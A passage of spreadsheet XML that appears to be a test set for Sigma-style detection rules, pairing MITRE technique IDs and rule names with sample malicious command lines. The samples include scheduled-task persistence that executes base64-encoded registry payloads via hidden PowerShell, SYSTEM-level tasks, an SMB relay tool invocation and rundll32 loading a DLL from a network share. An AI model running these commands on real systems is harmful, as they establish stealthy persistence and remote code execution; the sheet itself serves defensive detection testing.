          <t>schtasks.exe /CREATE /SC ONLOGON /TN "SSHD" /TR "sshd.exe -D" /F</t>
        </is>
      </c>
      <c r="F3895" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3895" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3895" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3895" s="43" t="n"/>
      <c r="J3895" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3895" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3896" ht="15.75" customHeight="1" s="42">
      <c r="A3896" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3896" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C3896" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D3896" s="43" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E3896" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /F /TN "SystemUpdater" /TR "powershell.exe -WindowStyle Hidden -Command IEX((Get-ItemProperty -Path HKCU:\SOFTWARE\PayloadKey).PayloadValue)" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F3896" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3896" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3896" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3896" s="43" t="n"/>
      <c r="J3896" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3896" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3897" ht="15.75" customHeight="1" s="42">
      <c r="A3897" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3897" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C3897" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D3897" s="43" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E3897" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /F /TN "TestTask" /TR "powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\TestTask).Payload)))" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F3897" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3897" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3897" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3897" s="43" t="n"/>
      <c r="J3897" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3897" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3898" ht="15.75" customHeight="1" s="42">
      <c r="A3898" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3898" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C3898" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D3898" s="43" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E3898" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /F /TN "TestTask" /TR "powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((gp HKCU:\SOFTWARE\TestTask).Payload)))" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F3898" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3898" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3898" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3898" s="43" t="n"/>
      <c r="J3898" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3898" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3899" ht="15.75" customHeight="1" s="42">
      <c r="A3899" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3899" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C3899" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D3899" s="43" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E3899" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /F /TN "TestTask" /TR "powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path 'HKCU:\SOFTWARE\TestTask').Payload)))" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F3899" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3899" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3899" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3899" s="43" t="n"/>
      <c r="J3899" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3899" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3900" ht="15.75" customHeight="1" s="42">
      <c r="A3900" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3900" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C3900" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D3900" s="43" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E3900" s="43" t="inlineStr">
        <is>
          <t>s c h t a s k s   / C r e a t e   / S C   O N L O G O N   / T N   s p a w n   / T R   C : \ w i n d o w s \ s y s t e m 3 2 \ c m d . e x e</t>
        </is>
      </c>
      <c r="F3900" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3900" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3900" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3900" s="43" t="n"/>
      <c r="J3900" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3900" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3901" ht="15.75" customHeight="1" s="42">
      <c r="A3901" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3901" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C3901" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D3901" s="43" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E3901" s="43" t="inlineStr">
        <is>
          <t>SCHTASKS  /Create /SC ONLOGON /TN spawn /TR C:\windows\system32\cmd.exe</t>
        </is>
      </c>
      <c r="F3901" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3901" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3901" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3901" s="43" t="n"/>
      <c r="J3901" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3901" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3902" ht="15.75" customHeight="1" s="42">
      <c r="A3902" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3902" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C3902" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D3902" s="43" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E3902" s="43" t="inlineStr">
        <is>
          <t>schtasks /create /tn "Updater HIGHEST" /tr "cmd.exe /c payload.exe" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F3902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3902" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3902" s="43" t="n"/>
      <c r="J3902" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3902" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3903" ht="15.75" customHeight="1" s="42">
      <c r="A3903" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3903" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C3903" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D3903" s="43" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E3903" s="43" t="inlineStr">
        <is>
          <t>schtasks /create /tn "Updater" /tr "cmd.exe /c payload.exe" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F3903" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3903" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3903" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3903" s="43" t="n"/>
      <c r="J3903" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3903" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3904" ht="15.75" customHeight="1" s="42">
      <c r="A3904" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3904" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C3904" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D3904" s="43" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E3904" s="43" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC ONLOGON /RU SYSTEM</t>
        </is>
      </c>
      <c r="F3904" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3904" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3904" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3904" s="43" t="n"/>
      <c r="J3904" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3904" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3905" ht="15.75" customHeight="1" s="42">
      <c r="A3905" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3905" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C3905" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D3905" s="43" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E3905" s="43" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC ONSTART /RU SYSTEM</t>
        </is>
      </c>
      <c r="F3905" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3905" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3905" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3905" s="43" t="n"/>
      <c r="J3905" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3905" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3906" ht="15.75" customHeight="1" s="42">
      <c r="A3906" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3906" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C3906" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D3906" s="43" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E3906" s="43" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC	ONLOGON	/RU	SYSTEM</t>
        </is>
      </c>
      <c r="F3906" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3906" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3906" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3906" s="43" t="n"/>
      <c r="J3906" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3906" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3907" ht="15.75" customHeight="1" s="42">
      <c r="A3907" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3907" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C3907" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D3907" s="43" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E3907" s="43" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC ONCE /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F3907" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3907" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3907" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3907" s="43" t="n"/>
      <c r="J3907" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3907" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3908" ht="15.75" customHeight="1" s="42">
      <c r="A3908" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3908" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C3908" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D3908" s="43" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E3908" s="43" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC ONIDLE /RU SYSTEM</t>
        </is>
      </c>
      <c r="F3908" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3908" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3908" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3908" s="43" t="n"/>
      <c r="J3908" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3908" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3909" ht="15.75" customHeight="1" s="42">
      <c r="A3909" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3909" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C3909" s="43" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D3909" s="43" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E3909" s="43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/st 07:45 /sc daily</t>
        </is>
      </c>
      <c r="F3909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3909" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3909" s="43" t="n"/>
      <c r="J3909" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3909" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3910" ht="15.75" customHeight="1" s="42">
      <c r="A3910" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3910" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C3910" s="43" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D3910" s="43" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E3910" s="43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/sc once /st 07:45</t>
        </is>
      </c>
      <c r="F3910" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3910" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3910" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3910" s="43" t="n"/>
      <c r="J3910" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3910" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3911" ht="15.75" customHeight="1" s="42">
      <c r="A3911" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3911" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C3911" s="43" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D3911" s="43" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E3911" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd.exe /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test)))" /sc daily /st 07:45</t>
        </is>
      </c>
      <c r="F3911" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3911" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3911" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3911" s="43" t="n"/>
      <c r="J3911" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3911" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3912" ht="15.75" customHeight="1" s="42">
      <c r="A3912" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3912" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C3912" s="43" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D3912" s="43" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E3912" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "SystemTask1" /TR "cmd.exe" /SC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F3912" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3912" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3912" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3912" s="43" t="n"/>
      <c r="J3912" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3912" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3913" ht="15.75" customHeight="1" s="42">
      <c r="A3913" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3913" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C3913" s="43" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D3913" s="43" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E3913" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SystemTask3" /tr "cmd.exe" /sc daily /ru SYSTEM</t>
        </is>
      </c>
      <c r="F3913" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3913" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3913" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3913" s="43" t="n"/>
      <c r="J3913" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3913" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3914" ht="15.75" customHeight="1" s="42">
      <c r="A3914" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B3914" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C3914" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D3914" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E3914" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin</t>
        </is>
      </c>
      <c r="F3914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3914" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3914" s="43" t="n"/>
      <c r="J3914" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3914" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3915" ht="15.75" customHeight="1" s="42">
      <c r="A3915" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B3915" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C3915" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D3915" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E3915" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin -z</t>
        </is>
      </c>
      <c r="F3915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3915" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3915" s="43" t="n"/>
      <c r="J3915" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3915" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3916" ht="15.75" customHeight="1" s="42">
      <c r="A3916" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B3916" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C3916" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D3916" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E3916" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin -c "{\"cmd.exe\"}"</t>
        </is>
      </c>
      <c r="F3916" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3916" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3916" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3916" s="43" t="n"/>
      <c r="J3916" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3916" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3917" ht="15.75" customHeight="1" s="42">
      <c r="A3917" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B3917" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_relay_attacks_tools</t>
        </is>
      </c>
      <c r="C3917" s="43" t="inlineStr">
        <is>
          <t>Potential SMB Relay Attack Tool Execution</t>
        </is>
      </c>
      <c r="D3917" s="43" t="inlineStr">
        <is>
          <t>5589ab4f-a767-433c-961d-c91f3f704db1</t>
        </is>
      </c>
      <c r="E3917" s="43" t="inlineStr">
        <is>
          <t>TempBenign_name.exe -t 192.168.1.10 -p payload.bin -c "{cmd.exe}" -z</t>
        </is>
      </c>
      <c r="F3917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3917" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3917" s="43" t="n"/>
      <c r="J3917" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3917" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3918" ht="15.75" customHeight="1" s="42">
      <c r="A3918" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3918" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C3918" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D3918" s="43" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E3918" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F3918" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3918" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3918" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3918" s="43" t="n"/>
      <c r="J3918" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3918" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3919" ht="15.75" customHeight="1" s="42">
      <c r="A3919" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3919" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C3919" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D3919" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E3919" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe</t>
        </is>
      </c>
      <c r="F3919" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3919" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3919" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3919" s="43" t="n"/>
      <c r="J3919" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3919" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3920" ht="15.75" customHeight="1" s="42">
      <c r="A3920" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3920" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C3920" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D3920" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E3920" s="43" t="inlineStr">
        <is>
          <t>rundll32</t>
        </is>
      </c>
      <c r="F3920" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3920" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3920" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3920" s="43" t="n"/>
      <c r="J3920" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3920" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3921" ht="15.75" customHeight="1" s="42">
      <c r="A3921" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3921" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C3921" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D3921" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
      <c r="E3921" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe #</t>
        </is>
      </c>
      <c r="F3921" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3921" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3921" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3921" s="43" t="n"/>
      <c r="J3921" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3921" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3922" ht="15.75" customHeight="1" s="42">
      <c r="A3922" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3922" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_without_parameters</t>
        </is>
      </c>
      <c r="C3922" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without Parameters</t>
        </is>
      </c>
      <c r="D3922" s="43" t="inlineStr">
        <is>
          <t>5bb68627-3198-40ca-b458-49f973db8752</t>
        </is>
      </c>
